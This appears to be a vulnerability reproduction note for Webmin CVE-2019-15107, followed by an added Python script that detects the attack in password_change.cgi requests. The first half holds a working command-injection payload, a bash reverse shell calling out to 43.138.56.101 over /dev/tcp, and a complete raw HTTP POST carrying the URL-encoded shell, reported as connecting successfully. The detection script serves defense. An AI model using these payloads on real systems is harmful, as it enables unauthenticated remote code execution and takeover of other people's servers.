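Vulnerability Overview
1. Vulnerability ID: CVE-2019-15107
2. Description: The password reset function in password_change.cgi contains a code execution vulnerability. Because input validation is missing, a malicious third party can execute malicious code.
3. Affected versions: Webmin <= 1.920
4. Exploitation conditions: the version falls in the affected range and the server's configuration file allows password changes. Under these conditions, arbitrary code can be executed without knowing a Webmin username or password.
Reproduction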
https://10.95.14.161:26163/
Vulnerability verification
https://10.95.14.161:62680/password_change.cgi
user=rootxx&pam=&expired=2&old=text|ls&new1=test2&new2=test2
Reverse shell
bash -c "bash -i >& /dev/tcp/43.138.56.101/4444 0>&1"
POST /password_change.cgi HTTP/1.1
Host: 10.95.14.161:62680
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Referer: https://10.95.14.161:62680/session_login.cgi
Connection: close
Content-Length: 138

user=rootxx&pam=&expired=2&old=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F43.138.56.101%2F1099%200%3E%261%22&new1=test2&new2=test2
The reverse shell connects successfully.
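
For detection, both requests above share one signature: a POST to password_change.cgi whose form fields carry shell metacharacters, either raw or percent-encoded. The following is an added example, not part of the original post: the function name, the metacharacter set and all sample requests except the first are assumptions made for illustration.

```python
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/password_change.cgi"
FIELDS = ("user", "old", "new1", "new2")
# Heuristic set of shell metacharacters (an assumption of this example, not
# Webmin's own filter). Real passwords may contain some of them, so a hit is
# an alert to triage, not proof of compromise.
SHELL_META = set("|;&`$<>\n")


def inspect_request(method, url, body):
    """Return [(field, offending_chars)] for a suspicious password-change POST."""
    if method.upper() != "POST" or urlsplit(url).path != TARGET_PATH:
        return []
    # parse_qs splits on "&" first and then percent-decodes each value,
    # so an encoded %7C is inspected as "|".
    form = parse_qs(body, keep_blank_values=True)
    findings = []
    for field in FIELDS:
        for value in form.get(field, []):
            bad = sorted(SHELL_META.intersection(value))
            if bad:
                findings.append((field, "".join(bad)))
    return findings


# Sample requests: the first body is the verification request shown above;
# the others are constructed for this example.
SAMPLES = [
    ("POST", "/password_change.cgi",
     "user=rootxx&pam=&expired=2&old=text|ls&new1=test2&new2=test2"),
    ("POST", "/password_change.cgi",        # same probe, percent-encoded
     "user=rootxx&pam=&expired=2&old=text%7Cls&new1=test2&new2=test2"),
    ("POST", "/password_change.cgi",        # ordinary password change
     "user=alice&pam=&expired=2&old=Winter2019&new1=Spring2020&new2=Spring2020"),
    ("POST", "/session_login.cgi",          # different endpoint, ignored
     "user=alice&pass=a|b"),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        hits = inspect_request(method, url, body)
        print("ALERT" if hits else "ok   ", url, hits)
```

On a host running Webmin <= 1.920, an alert from this check on an unauthenticated request warrants immediate triage; on later versions it still indicates probing for this CVE.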